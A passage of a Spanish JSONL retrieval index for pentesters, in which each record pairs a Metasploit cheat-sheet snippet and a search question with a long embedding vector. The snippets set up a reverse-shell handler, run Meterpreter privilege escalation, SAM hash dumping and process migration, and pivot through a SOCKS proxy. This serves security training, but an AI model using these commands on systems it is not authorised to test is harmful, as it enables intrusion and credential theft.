0.06351, -0.0752, 0.12235, -0.0596, 0.07502, -0.04236, -0.06355, 0.18447, -0.06424, 0.09206, 0.0575, -0.02303, -0.04291, -0.04019, 0.04076, 0.05393, -0.13517, -0.06357, 0.04466, 0.03488, -0.00067, 0.06932, -0.06095, -0.06267, 0.10291, 0.01924, -0.00124, -0.00296, -0.00086, -0.0597, 0.0387, -0.0246, -0.02678, -0.03301, 0.02622, -0.08146, 0.03223, 0.03528, -0.06254, 0.04374, -0.00082, -0.11605, -0.02747, 0.10675, -0.07048, 0.04127, -0.0806, -0.05612, 0.04962, 0.14755, 0.05137, 0.07894, -0.00933, -0.14858, 0.01407, -0.01981, -0.00612, 0.08464, -0.10579, 0.03106, -0.06313, -0.12806, -0.01878, 0.03494, 0.01819, 0.1218, -0.02477, 0.09587, 0.00311, 0.00468, -0.01258, -0.06034, 0.02633, 0.11782, -0.06341, 0.02697, 0.05686, 0.00924, -0.03283, -0.08498, -0.02841, 0.02942, -0.02137, -0.0189, 0.02622, -0.01216, 0.15476, 0.08866, 0.04761, -0.02129, 0.00337, -0.03789, 0.12003, -0.05625, -0.03756, -0.06476, 0.03765, 0.1314, 0.02523, -0.04364, -0.06086, -0.02808, 0.06362, 0.01979, 0.0959, 0.02479, -0.04078, 0.07425, -0.01121, -0.03956, 0.03397, -0.01423, -0.10156, 0.02933, 0.02723, -0.09218, -0.11835, 0.01723, 0.04343, -0.04564, 0.01171, 0.02094, -0.01435, 0.01667, 0.00366, -0.01661, -0.1256, 0.01018, 0.01438, -0.02769, -0.07244, 0.00592, -0.01725, 0.03545, -0.05452, 0.0102, -0.05459, -0.00029, 0.04586, -0.00697, 0.04726, -0.01727, -0.01392, 0.00514, 0.01037, 0.06062, -0.07712, -0.04466, -0.0074, -0.05611, 0.11279, 0.02895, -0.07855, 0.11908, 0.06948, 0.06799, 0.03772, -0.01614, -0.0458, 0.02265, -0.04881, -0.06528, 0.01652, -0.0216, -0.08734, 0.09821, 0.03244, 0.0534, 0.08, 0.01367, -0.03441, -0.02107, -0.02542, -0.00423, 0.06032, 0.06268, -0.01192, 0.08567, -0.00175, 0.01642, -0.03155, 0.02964, -0.001, -0.02535, -0.02985, -0.00988, -0.01696, 0.09546, 0.00537, -0.10565, -0.03073, -0.04947, -0.00904, 0.04251, -0.00144, -0.04613, -0.01595, 0.02651, -0.00449, -0.06262, 0.01769, -0.01348]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## multi/handler (recibir un payload de msfvenom)\n```\nuse exploit/multi/handler\nset payload windows/shell_reverse_tcp # o windows/meterpreter/reverse_tcp\nset LHOST TU_IP ; set LPORT 443 ; run\n```", "indexar": "cual es una alternativa libre a los exploits de Metasploit?", "v": [-0.01997, 0.02601, -0.06873, 0.00884, -0.03307, 0.03056, -0.07214, -0.0538, -0.22574, -0.00811, -0.03682, -0.12714, -0.01407, 0.1396, 0.05718, -0.12131, 0.07233, -0.1231, 0.08908, -0.19336, -0.10686, -0.01383, -0.03805, -0.14531, -0.01917, 0.05691, -0.02592, 0.11693, -0.04471, 0.02403, -0.06608, 0.0542, -0.04791, -0.04915, 0.06125, 0.00416, 0.16668, -0.00328, 0.20753, -0.01713, -0.02674, -0.13191, -0.10719, 0.09191, 0.10295, -0.11484, -0.15436, -0.00187, -0.06087, 0.06304, -0.01915, -0.05004, -0.13502, 0.02954, 0.04519, -0.04833, 0.11148, -0.04465, -0.13549, 0.02943, -0.02398, 0.00979, 0.04983, -0.04559, 0.03525, -0.05922, -0.03868, 0.00596, -0.11067, 0.17006, 0.05403, 0.01663, 0.00692, 0.00271, -0.11007, 0.02912, -0.05972, -0.04032, -0.02185, 0.09226, -0.0016, -0.07616, -0.04271, 0.03447, -0.06477, -0.04037, 0.03783, -0.06877, 0.01508, 0.05003, 0.05716, 0.00244, -0.02224, 0.03325, -0.05388, -0.11559, 0.03823, 0.11139, 0.02202, 0.15847, 0.03859, 0.02309, -0.09745, 0.02387, 0.02208, 0.00527, -0.06504, 0.03643, -0.11258, -0.03229, 0.06265, 0.03488, 0.01741, 0.04701, 0.07268, 0.01881, -0.0363, -0.03301, -0.02341, -0.01125, -0.07647, -0.06621, -0.02228, -0.04647, 0.04062, 0.0702, 0.0069, -0.01813, -0.01093, -0.05045, 0.06447, 0.04661, -0.0079, -0.01987, -0.08255, -0.09879, 0.16246, -0.06255, -0.00175, -0.01065, 0.02264, 0.05338, 0.06038, 0.00251, 0.00358, -0.02523, -0.01482, -0.00893, 0.04058, -0.0722, -0.05823, -0.03636, -0.01903, 0.09599, -0.06173, -0.02249, -0.06941, 0.00901, -0.01594, 0.11369, 0.05623, -0.08735, 0.00646, 0.00911, -0.051, -0.01701, 0.05486, -0.02922, -0.14594, 0.01567, 0.03024, 0.10078, 0.12375, -0.01768, 0.07039, -0.10881, -0.01817, -0.04235, 0.02711, 0.00774, -0.03884, 0.00322, 0.02669, 0.0242, 0.008, -0.05045, 0.04584, -0.02375, 0.00852, -0.03078, 0.02779, -0.00883, -0.03974, -0.01323, -0.03, 0.05696, -0.01074, -0.05993, -0.01311, -0.03012, -0.00409, -0.03166, 0.00068, -0.05318, 0.01843, -0.00013, -0.03643, 0.02263, -0.03235, 0.04478, 0.04341, 0.0162, 0.06492, -0.02061, -0.08589, 0.00849, 0.0138, 0.04656, -0.05504, -0.0535, 0.02862, 0.04369, 0.01507, -0.02686, -0.06459, 0.03709, -0.03128, 0.01191, -0.03149, -0.00254, -0.0298, 0.00504, -0.00156, 0.03394, -0.02275, 7e-05, 0.02315, 0.01395, 0.01561, 0.00244, 0.01901, 0.09125, -0.00915, -0.01148, -0.02863, -0.00954, -0.07369, -0.0281, -0.02099, -0.04407, -0.01095, 0.0011, -0.0113, -0.00204, 0.04494, 0.0199]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Meterpreter (post-explotaciΓ³n)\n```\ngetuid # quiΓ©n soy\ngetsystem # intento de privesc a SYSTEM\nhashdump # vuelca hashes SAM β†’ Cracking de contraseΓ±as / Pass-the-Hash\nps ; migrate 799 # migrar a otro proceso\nbackground ; sessions -i 1\n```", "indexar": "que programa sirve para intentar volcar las contraseΓ±as en un sistema comprometido?", "v": [0.07821, 0.06524, -0.20052, -0.21271, 0.00454, -0.15758, 0.04824, -0.12672, -0.02757, -0.12432, -0.04032, -0.03787, -0.00545, -0.09314, -0.00914, 0.09424, 0.06606, -0.12187, 0.06585, 0.11962, -0.01969, -0.07092, 0.00633, -0.08006, -0.03741, 0.05529, -0.0839, -0.09231, -0.11028, -0.00539, 0.00443, -0.01885, 0.11835, -0.06902, 0.01893, 0.05909, -0.02476, 0.08069, 0.05831, 0.08671, 0.1052, 0.02482, -0.05502, 0.0666, 0.06663, 0.00885, 0.04796, -0.00348, 0.09512, -0.0035, -0.0934, -0.05711, 0.01908, -0.07386, 0.06858, -0.11799, 0.03044, -0.06592, -0.07833, 0.00419, -0.05406, 0.0327, 0.07865, 0.03154, 0.01479, -0.05342, 0.07662, -0.03589, -0.10034, 0.11664, 0.02997, 0.02188, 0.04691, -0.04157, -0.03904, 0.03037, 0.06892, 0.01632, 0.01131, -0.02234, -0.05863, -0.00313, -0.00616, 0.03905, -0.03554, 0.00794, 0.08953, 0.02411, 0.03243, -0.05464, 0.04991, 0.01647, 0.00973, 0.15231, 0.0388, -0.05066, 0.06993, 0.05509, -0.01882, -0.0336, 0.04511, -0.00303, -0.05764, 0.11676, -0.12336, 0.00569, 0.04712, 0.01124, 0.05292, -0.01422, 0.02125, -0.00472, -0.04694, -0.07314, -0.09075, -0.04727, -0.04621, -0.05164, 0.0281, -0.00605, -0.10555, -0.00497, -0.03929, 0.02682, 0.13245, 0.08863, -0.01512, 0.08464, -0.00996, 0.03312, 0.03401, 0.03006, -0.06919, 0.03195, -0.04366, -0.03385, 0.02791, -0.04723, -0.08677, 0.02884, -0.00057, 0.10695, 0.08267, -0.05393, 0.04247, 0.07909, 0.06226, -0.08335, 0.01931, -0.00931, -0.05497, 0.05374, 0.00081, 0.06545, -0.0734, 0.00194, 0.05154, -0.1017, -0.03755, 0.06249, 0.02759, -0.00162, -0.02997, 0.03062, -0.0139, -0.03915, -0.02151, 0.00858, 0.14084, 0.0899, -0.00028, 0.09484, 0.06477, -0.09865, -0.00561, -0.0025, 0.01988, -0.15676, 0.02942, -0.04339, -0.12064, 0.01067, 0.04631, 0.00377, 0.01494, -0.06316, -0.00113, 0.03092, -0.01928, -0.07214, 0.09476, -0.00412, -0.02163, 0.03489, -0.01395, -0.02443, -0.0636, -0.04379, 0.03325, -0.03734, -0.07509, -0.00069, -0.02512, -0.04948, 0.02564, 0.09977, -0.00529, -0.02202, 0.01838, 0.07762, 0.04417, 0.00752, 0.06887, -0.0086, -0.10266, -0.05154, -0.03214, 0.05522, 0.03308, 0.01312, 0.04864, -0.01735, 0.02045, 0.08402, -0.00445, -0.0942, 0.05316, 0.06306, 0.03913, -0.03654, -0.02488, -0.06419, -0.02108, 0.01129, 0.04948, -0.01039, -0.03858, -0.04663, -0.06248, -0.14816, -0.03424, 0.09067, 0.00887, -0.10094, -0.0573, -0.0601, -0.04506, 0.01248, 0.05351, -0.0039, -0.07279, 0.04035, -0.02268, -0.04555, 0.05942, -0.00059]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Meterpreter (post-explotaciΓ³n)\n```\ngetuid # quiΓ©n soy\ngetsystem # intento de privesc a SYSTEM\nhashdump # vuelca hashes SAM β†’ Cracking de contraseΓ±as / Pass-the-Hash\nps ; migrate 799 # migrar a otro proceso\nbackground ; sessions -i 1\n```", "indexar": "con quΓ© herramienta puedo cambiar de proceso despuΓ©s de entrar a una mΓ‘quina?", "v": [-0.03353, 0.21616, -0.13542, -0.10177, -0.05703, -0.04776, -0.11022, 0.00828, -0.08448, -0.10637, -0.1127, 0.0402, 0.02766, -0.05726, 0.00469, 0.07004, 0.07339, -0.04245, -0.00527, 0.04787, -0.02395, -0.0303, -0.05381, -0.07497, -0.04125, 0.0716, 0.04942, -0.00934, -0.28048, 0.01087, -0.02566, 0.0441, 0.14922, -0.05248, -0.05946, -0.10835, 0.00802, 0.09853, 0.10344, 0.07614, -0.0045, 0.04495, -0.05682, 0.1088, 0.08705, -0.06837, 0.02392, -0.0007, 0.00147, 0.04059, -0.03729, -0.16689, -0.0501, 0.03792, 0.03139, -0.13812, 0.20869, -0.10442, 0.04467, -0.12788, -0.08518, 0.08627, -0.08252, 0.0497, -0.00948, -0.02924, -0.05769, -0.05984, -0.02481, 0.14641, -0.10547, -0.06563, -0.0093, -0.08568, -0.00293, -0.01121, 0.07519, -0.01534, 0.02446, 0.01192, 0.00668, 0.04264, -0.08799, 0.00366, 0.04415, -0.05713, 0.0439, -0.06548, 0.1036, -0.0853, -0.04409, 0.04517, 0.07894, 0.00597, 0.07101, 0.05292, 0.03181, -0.07256, -0.01901, -0.00768, 0.16035, -0.05813, -0.08965, 0.12846, -0.09709, 0.02467, 0.0213, -0.01537, -0.08287, -0.06865, 0.06408, 0.04861, 0.00113, -0.01522, -0.03746, 0.07747, -0.01089, -0.03194, -0.08169, -0.00686, 0.00839, 0.06271, -0.0451, -0.06605, 0.00662, -0.04112, -0.00288, 0.08314, -0.05177, -0.05648, -0.00151, 0.02651, -0.07476, 1e-05, -0.03549, -0.08641, 0.03221, -0.11348, 0.04304, -0.10129, -0.02434, 0.06958, -0.06175, -0.08648, 0.02404, -0.02141, 0.07168, -0.0957, -0.04931, -0.02902, 0.03949, -0.06505, 0.06686, 0.0275, -0.08606, 0.01696, -0.05162, -0.0202, -0.05127, 0.00164, -0.11134, -0.0466, 0.00029, 0.00523, -0.01159, -0.00471, 0.02007, 0.01526, 0.04883, 0.00968, 0.00528, -0.01349, 0.06191, 0.05276, 0.0093, 0.00729, -0.10227, -0.00541, 0.01584, -0.04102, 0.0016, 0.07417, -0.02398, -0.08403, 0.01912, -0.03356, -0.00146, -0.02251, -0.02686, 0.04372, 0.02187, 0.05439, -0.03063, -0.06643, 0.01774, 0.0291, -0.00745, -0.0113, 0.03302, -0.04866, -0.09439, -0.00154, -0.00218, -0.03479, -0.01278, 0.07035, -0.03617, -0.04945, -0.01317, -0.00557, 0.05615, 0.00776, 0.05383, 0.0398, -0.05496, -0.00053, -0.03901, 0.04591, -0.03364, 0.01699, 0.11453, -0.02973, 0.04339, -0.00719, -0.03642, -0.03245, 0.01067, 0.04973, 0.003, 0.01441, -0.00562, 0.01013, 0.00124, -0.02966, 0.04073, -0.02385, 0.02822, -0.03506, -0.0586, -0.01022, 0.02932, 0.05104, 0.02929, -0.02708, -0.01093, -0.00182, -0.04653, -0.03501, -0.02501, -0.05595, -0.0951, 0.02273, 0.04919, -0.02498, 0.00735, 0.00582]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Meterpreter (post-explotaciΓ³n)\n```\ngetuid # quiΓ©n soy\ngetsystem # intento de privesc a SYSTEM\nhashdump # vuelca hashes SAM β†’ Cracking de contraseΓ±as / Pass-the-Hash\nps ; migrate 799 # migrar a otro proceso\nbackground ; sessions -i 1\n```", "indexar": "cual es una opcion libre para obtener permisos de administrador sin usar herramientas comerciales?", "v": [0.09016, 0.07948, -0.10337, -0.18398, -0.02772, -0.11757, -0.01257, -0.08642, -0.22512, -0.10439, -0.10391, -0.11568, 0.06172, -0.03862, 0.03471, -0.02085, 0.15782, -0.11734, 0.03392, 0.07403, 0.06655, 0.01699, -0.05165, 0.00881, -0.05681, 0.01646, 0.10589, -0.13682, -0.22338, 0.04777, 0.05096, 0.01787, 0.09154, -0.07332, 0.05968, -0.03568, -0.02466, 0.06066, 0.06153, 0.00973, 0.08415, -0.03835, -0.15115, 0.06618, 0.04663, -0.01455, -0.05924, 0.03751, -0.06299, 0.00273, -0.00565, -0.09696, -0.17826, -0.08496, 0.11068, 0.00276, 0.13881, -0.0589, 0.01553, -0.01267, -0.01533, 0.01848, 0.01984, 0.02528, -0.03743, -0.00498, 0.06845, -0.00446, -0.05243, 0.1092, -0.02489, 0.06344, 0.01001, 0.07221, 0.07606, 0.05709, -0.06804, 0.03401, 0.04055, 0.01815, 0.08144, -0.01349, -0.12602, 0.01872, -0.06982, -0.17079, 0.01397, -0.09253, -0.015, -0.02219, 0.0511, 0.06412, -0.0647, -0.02756, 0.11245, -0.09091, -0.00486, 0.06948, -0.05423, 0.13092, 0.09434, 0.01367, -0.055, 0.08802, -0.07535, 0.03993, 0.03498, -0.05382, -0.0472, -0.00615, -0.00905, 0.02541, -0.02311, 0.04102, -0.03791, 0.04461, -0.08062, -0.11607, -0.05014, -0.02108, 0.02069, -0.04423, 0.01096, 0.05785, 0.05706, 0.00694, 0.03693, 0.1198, -0.04299, -0.05965, 0.0348, -0.06434, -0.01502, -0.07377, -0.08225, 0.02422, -0.01832, -0.05895, -0.05882, -0.04556, -0.04739, -0.00374, -0.02224, -0.03038, 0.12404, 0.01521, -0.04245, -0.06587, 0.01793, -0.06088, 0.01916, -0.02258, 0.02387, 0.12171, -0.00511, 0.02381, -0.01298, -0.06258, -0.03796, 0.06679, 0.02711, -0.00021, -0.01861, 0.05852, 0.05143, -0.03975, -0.04332, -0.00202, 0.00555, 0.02763, -0.00965, 0.0347, 0.04056, -0.07247, 0.04514, -0.05453, -0.04841, -0.05814, 0.00723, -0.05068, -0.00018, 0.02476, -0.10393, -0.00689, -0.0645, -0.04314, -0.0013, 0.00918, 0.00491, 0.07486, -0.01521, 0.08384, -0.03633, -0.06882, 0.02656, 0.01111, 0.01411, -0.02873, -0.03709, -0.07893, -0.02756, -0.01659, -0.02969, -0.06444, 0.06584, -0.00832, -0.04221, 0.04343, 0.02616, 0.02794, -0.00215, -0.0625, 0.08318, -0.03102, -0.04126, -0.00944, 0.01473, 0.00339, -0.00094, -0.05691, 0.06937, 0.05129, 0.04299, -0.00576, 0.05794, -0.0153, 0.00524, 0.04779, -0.00655, 0.05249, -0.04345, 0.0631, -0.02628, -0.0163, 0.04499, -0.01353, 0.07114, 0.00617, 0.01349, -0.01629, 0.0673, 0.06017, 0.00216, -0.04486, -0.04755, -0.02847, -0.05332, -0.01192, -0.07169, -0.07381, -0.00871, 0.04653, 0.02838, -0.03753, 0.03198, -0.01799]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Ctrl+Z para mandar la shell a background, luego:\nuse post/multi/manage/shell_to_meterpreter\nset SESSION 1 ; run\nsessions -i 2\n```", "indexar": "quΓ© herramienta puedo usar para lanzar Metasploit desde la lΓ­nea de comandos sin abrir una interfaz grΓ‘fica?", "v": [-0.04129, 0.06376, -0.17278, -0.19109, 0.05796, -0.1077, -0.05894, -0.03511, -0.14268, 0.00155, -0.05928, -0.08154, -0.01864, -0.06463, 0.06885, 0.07801, 0.05127, -0.03812, -0.06378, -0.16705, -0.02097, 0.01745, -0.09679, -0.16413, -0.05526, -0.00469, 0.07237, -0.11956, -0.13991, 0.0015, -0.14236, 0.02567, 0.06751, 0.00326, -0.09661, -0.08636, 0.01042, 0.03133, 0.11427, 0.04793, -0.00387, 0.08154, -0.1628, 0.06908, 0.08992, -0.09396, -0.01664, 0.01588, -0.02918, 0.013, -0.00715, -0.19624, -0.10548, 0.06235, -0.08151, -0.10684, 0.23237, -0.1092, 0.01359, 0.00597, -0.0079, 0.01169, 0.04406, 0.01657, -0.02376, -0.07938, -0.04677, -0.12247, -0.08093, 0.08505, -0.0418, 0.09837, -0.04156, 0.055, 0.08776, 0.05066, -0.10261, -0.02445, 0.1994, 0.02539, 0.04411, 0.02304, -0.04352, 0.01321, -0.04402, -0.107, -0.02336, 0.02135, 0.01026, -0.05007, 0.03201, 0.02952, -0.05669, -0.04182, 0.03023, -0.02702, -0.06547, -0.00332, 0.05029, -0.03978, 0.0646, -0.05151, -0.14731, 0.11184, -0.00563, -0.04182, -0.02727, -0.06254, -0.08473, 0.00683, 0.09463, -0.08017, 0.01255, 0.01328, -0.03785, 0.01292, 0.00965, -0.05559, -0.04932, -0.06607, -0.03188, 0.00448, 0.03573, 0.02568, -0.01615, -0.00382, -0.05735, 0.07614, 0.01158, -0.05761, -0.0522, -0.02709, -0.01229, -0.07835, -0.08236, 0.01693, -0.01027, -0.07078, 0.00466, -0.11009, 0.04076, 0.0677, 0.01289, -0.03982, 0.00872, 0.01615, 0.00301, -0.08834, -0.10259, -0.03842, 0.10626, -0.01644, -0.01841, 0.02507, -0.02357, -0.01192, -0.01812, 0.04895, -0.03021, -0.01687, -0.02278, -0.01988, -0.01167, 0.02974, 0.00836, -0.0793, -0.07073, 0.00851, 0.00301, 0.04946, 0.04506, 0.07458, 0.06558, -0.01248, 0.03743, -0.06796, -0.06142, 0.01135, -0.02397, -0.0464, -0.05293, -0.00196, 0.00791, -0.05563, -0.06002, -0.04703, 0.00606, -0.03862, -0.00998, 0.00193, -0.02015, 0.08133, -0.00961, -0.00939, 0.04313, -0.02215, 0.06549, -0.02336, -0.03231, -0.01359, -0.01943, 0.00923, -0.0143, -0.09849, 0.09202, 0.07006, -0.04141, 0.04846, -0.00972, 0.03657, 0.02294, -0.04501, 0.06076, -0.01565, -0.00633, -0.0117, 0.00813, 0.0109, -0.00098, -0.03203, -0.00854, 0.03802, -8e-05, -0.02014, 0.02076, 0.02667, -0.04022, -0.02784, 0.02215, 0.00818, 0.003, 0.0067, -0.01726, -0.02504, 0.0084, -0.01226, 0.02187, -0.02445, -0.03191, -0.04271, -0.02036, 0.09831, -0.02869, -0.05026, -0.00988, -0.08788, -0.06301, -0.00645, -0.00932, -0.07343, -0.05444, 0.0186, 0.08354, -0.03088, -0.02202, 0.00596]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Ctrl+Z para mandar la shell a background, luego:\nuse post/multi/manage/shell_to_meterpreter\nset SESSION 1 ; run\nsessions -i 2\n```", "indexar": "cΓ³mo puedo ejecutar un script de Metasploit en segundo plano usando la terminal?", "v": [-0.07396, 0.09829, -0.18043, -0.16429, 0.01263, -0.09528, -0.03843, -0.07613, -0.10784, 0.0387, -0.20031, 0.05568, 0.08637, -0.04266, -0.00301, -0.01775, 0.02123, -0.09914, 0.09544, -0.21358, -0.04548, -0.06, -0.06387, -0.05926, 0.00155, 0.09785, -0.01733, 0.06069, -0.10892, -0.10395, -0.03076, -0.01255, 0.09311, -0.08582, -0.0133, -0.02098, 0.04118, 0.03939, 0.06842, 0.14065, -0.10133, 0.00188, -0.08473, 0.07557, 0.09539, -0.06497, 0.06671, -0.0912, -0.0488, -0.09449, 0.02713, 0.04225, -0.11062, 0.04736, -0.03222, -0.01588, 0.12687, -0.1477, -0.01433, -0.00856, 0.04316, -0.04948, 0.07953, 0.09566, 0.03996, 0.05077, -0.0279, 0.06611, -0.04027, 0.03405, -0.04638, 0.06546, -0.0249, 0.04582, 0.09933, 0.00558, -0.08148, 0.02752, 0.10117, 0.05351, -0.06301, -0.03662, -0.11583, 0.02924, -0.04852, -0.07518, -0.17496, 0.06012, 0.04404, 0.04689, 0.06475, -0.06827, -0.00246, 0.02121, -0.02389, -0.05145, -0.00341, 0.00403, -0.0034, 0.08544, 0.1466, 0.0481, -0.0685, 0.12739, -0.00487, 0.09358, 0.07576, 0.0114, -0.05078, -0.06567, 0.0396, -0.01058, 0.01968, -0.03763, -0.07002, -0.02133, 0.00932, -0.05006, 0.01775, -0.00456, -0.05391, 0.01665, -0.04826, 0.01278, 0.01276, -0.01525, -0.04757, 0.01204, 0.03354, -0.03649, -0.02907, 0.04059, 0.06156, -0.01861, -0.14164, 0.05114, 0.11848, -0.10707, -0.09356, -0.02462, 0.01963, 0.07795, 0.00515, 0.039, 0.07341, -0.01649, 0.00715, -0.02822, -0.01645, -0.0199, 0.03674, -0.03291, -0.03018, 0.01677, -0.07925, -0.09715, -0.00566, 0.02498, -0.0085, 0.06181, -0.0702, -0.09095, -0.14891, 0.06807, 0.00967, 0.00055, -0.03572, -0.07881, 0.01561, 0.04403, 0.08033, 0.01045, 0.07651, -0.03015, 0.07833, -0.12359, 0.03098, 0.0114, 0.01718, 0.0446, -0.0266, -0.00322, 0.05321, 0.04523, -0.02432, -0.06435, 0.02184, -0.01527, 0.03644, 0.08656, 0.05474, 0.04333, 0.03299, -0.00949, 0.02314, -0.01504, 0.04464, -0.00353, -0.04901, -0.02353, 0.01319, 0.01622, 0.02805, -0.04147, 0.07712, 0.03671, -0.10118, 0.00681, -0.024, 0.06981, 0.01805, -0.03411, 0.06201, -0.00865, -0.02487, 0.04474, -0.0511, 0.06833, 0.03466, 0.0393, -0.02355, 0.01639, 0.00474, -0.0041, 0.00635, -0.00392, -0.01343, 0.01667, -0.01389, 0.05087, -0.08534, 0.06819, -0.02786, -0.02219, 0.00403, 0.01441, 0.00201, -0.05491, 0.00084, -0.0686, 0.04866, 0.09499, -0.00773, -0.03797, -0.04103, -0.01499, -0.04896, -0.00479, 0.00708, -0.02315, -0.06179, -0.01134, 0.06392, -0.02892, -0.02733, 0.01043]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Ctrl+Z para mandar la shell a background, luego:\nuse post/multi/manage/shell_to_meterpreter\nset SESSION 1 ; run\nsessions -i 2\n```", "indexar": "existe alguna forma de gestionar sesiones y mΓ³dulos de Metasploit directamente desde el shell?", "v": [-0.00573, 0.05686, -0.11899, -0.1546, -0.02893, -0.05634, -0.08756, -0.05645, -0.08375, -0.03606, -0.18093, 0.07362, 0.10925, -0.14776, 0.15459, 0.04394, 0.05477, -0.18948, -0.10861, -0.09387, -0.08162, -0.05423, -0.02433, -0.05635, -0.04885, 0.1645, 0.08139, 0.00249, 0.04333, 0.00755, 0.03663, -0.10179, -0.07203, -0.1449, 0.01733, -0.05509, -0.03053, 0.00465, -0.02151, 0.03574, -0.16476, 0.01618, -0.08187, 0.08121, 0.16434, -0.03116, -0.06522, -0.0869, -0.0854, -0.0201, -0.02919, -0.03599, -0.15407, 0.1, 0.00386, -0.11399, 0.16248, -0.1483, 0.09143, -0.00769, 0.00331, 0.10912, 0.01873, 0.09683, 0.11736, 0.0254, 0.06961, -0.0543, -0.14242, 0.09827, -0.10303, -0.01721, -0.04157, -0.01041, 0.03996, -0.01768, 0.01665, 0.01703, 0.04743, 0.01315, 0.04889, -0.05887, -0.02022, 0.03449, -0.12526, 0.03914, -0.06155, -0.08621, -0.06589, 0.02322, -0.01301, -0.02217, 0.00167, -0.10494, -0.07478, -0.00302, -0.10099, 0.0751, 0.02803, 0.04564, 0.00579, 0.12083, -0.02748, 0.16603, 0.01158, 0.07683, -0.02593, -0.03423, 0.03938, 0.0093, -0.02528, -0.00553, 0.00241, -0.01897, 0.03558, 0.01717, 0.03841, 0.03113, -0.02726, 0.00947, -0.0454, -0.07928, -0.02372, 0.00132, 0.04419, 0.02724, -0.049, 0.01055, -0.00267, -0.02638, -0.05359, -0.03826, 0.05286, 0.06367, -0.04375, 0.04397, 0.05565, 0.03774, -0.02985, -0.15586, -0.04567, 0.09479, 0.06589, -0.0146, 0.03124, -0.00615, -0.02006, -0.05588, 0.05206, -0.00249, 0.08966, -0.00677, 0.03357, 0.05597, -0.06718, -0.02504, -0.04611, -0.0057, -0.00797, 0.06829, -0.02053, -0.02131, -0.06756, 0.03559, -0.00998, -0.02664, -0.04793, 0.08314, -0.01137, 0.07801, 0.02249, 0.04747, 0.09198, 0.0191, 0.04231, 0.04825, -0.0042, -0.10868, 0.04888, -0.02232, 0.01491, 0.02893, 0.05174, -0.01599, -0.04377, -7e-05, -0.01042, 0.09163, -0.05877, 0.02014, 0.03976, 0.03658, -0.04979, -0.02626, 0.00246, 0.04694, -0.01258, -0.06323, 0.02469, 0.06824, -0.04345, 0.02201, 0.04542, -0.04942, 0.01623, 0.02511, -0.08446, 0.04797, 0.04029, -6e-05, -0.00897, 0.02559, 0.0317, -0.01934, -0.01189, 0.0238, -0.00838, 0.02897, 0.01562, 0.0244, -0.07892, 0.01432, 0.05582, -0.00298, 0.02774, -0.02144, -0.00513, 0.00741, 0.01822, 0.03035, -0.06311, 0.03667, 0.02168, 0.02685, -0.00582, 0.0399, 0.07739, -0.01602, -0.00712, 0.01889, 0.01794, 0.06668, 0.02581, -0.00301, 0.00012, -0.04055, -0.06842, -0.0033, 0.00286, -0.00985, -0.0348, -0.00194, 0.00474, 0.02326, -0.02924, -0.03865]} +{"tipo": "pregunta", "herramienta": "Metasploit", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Metasploit.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Pivoting con Metasploit\n```\nuse post/multi/manage/autoroute\nset SESSION 1 ; set SUBNET 192.168.5.0 ; run\nuse auxiliary/server/socks_proxy ; run # + proxychains β†’ Tunneling\nportfwd add -l 3389 -p 3389 -r 192.168.5.10\n```\n\nRelacionado: Buffer Overflow Β· Reverse shell Β· Reglas de herramientas Β· OSCP MOC", "indexar": "que programa puedo usar para montar un proxy SOCKS en red", "v": [-0.0206, -0.01247, -0.27231, -0.06426, -0.05032, -0.14519, 0.00556, -0.05493, -0.08104, -0.06287, -0.16175, -0.05701, 0.08016, -0.21925, -0.0101, 0.03678, 0.01765, -0.08692, 0.02708, 0.10511, 0.03027, -0.05035, -0.08497, -0.10355, 0.15938, 0.19954, 0.11167, -0.06697, -0.02229, -0.06003, -0.01578, 0.09446, 0.08631, 0.00528, -0.05783, -0.07722, 0.06342, 0.01377, 0.16114, 0.06271, -0.0044, -0.06308, -0.05917, 0.03121, 0.08602, 0.01101, 0.06588, -0.12588, -0.06623, -0.00302, 0.03467, -0.10388, -0.16426, 0.04409, -0.022, -0.11114, -0.02723, -0.11266, -0.0987, 0.03195, 0.04883, 0.04346, 0.03954, 0.01669, 0.06376, -0.09525, 0.00453, 0.03265, -0.119, 0.02632, -0.02155, -0.05024, 0.04169, -0.04762, -0.02004, 0.05306, -0.0182, -0.13688, 0.11332, -0.02936, -0.04529, 0.04664, 0.02047, 0.09294, -0.10038, -0.04856, 0.03902, -0.08128, 0.03053, -0.04336, 0.01037, 0.05467, 0.09656, -0.0129, 0.11705, -0.13251, 0.10552, 0.04034, 0.02926, -0.02574, 0.01981, -0.03444, -0.01594, 0.11234, -0.02981, 0.03267, 0.03419, -0.04997, 0.03332, 0.02194, 0.01795, -0.03276, -0.05615, -0.05361, 0.00454, -0.07278, -0.0068, 0.05982, 0.03989, -0.05953, -0.05025, 0.05745, -0.04915, -0.00771, 0.1232, -0.04737, -0.02464, 0.10026, -0.09469, 0.07387, -0.00838, -0.02369, -0.01005, -0.11805, -0.10636, -0.01231, 0.00453, -0.08745, -0.00594, -0.07484, 0.01049, -0.01111, -0.07751, -0.01612, -0.00313, 0.11291, 0.01461, -0.02598, 0.03263, 2e-05, 0.07013, 0.06781, -0.02442, 0.01516, -0.06248, 0.00676, 0.08823, -0.02906, 0.0032, 0.04507, -0.04032, -0.03479, 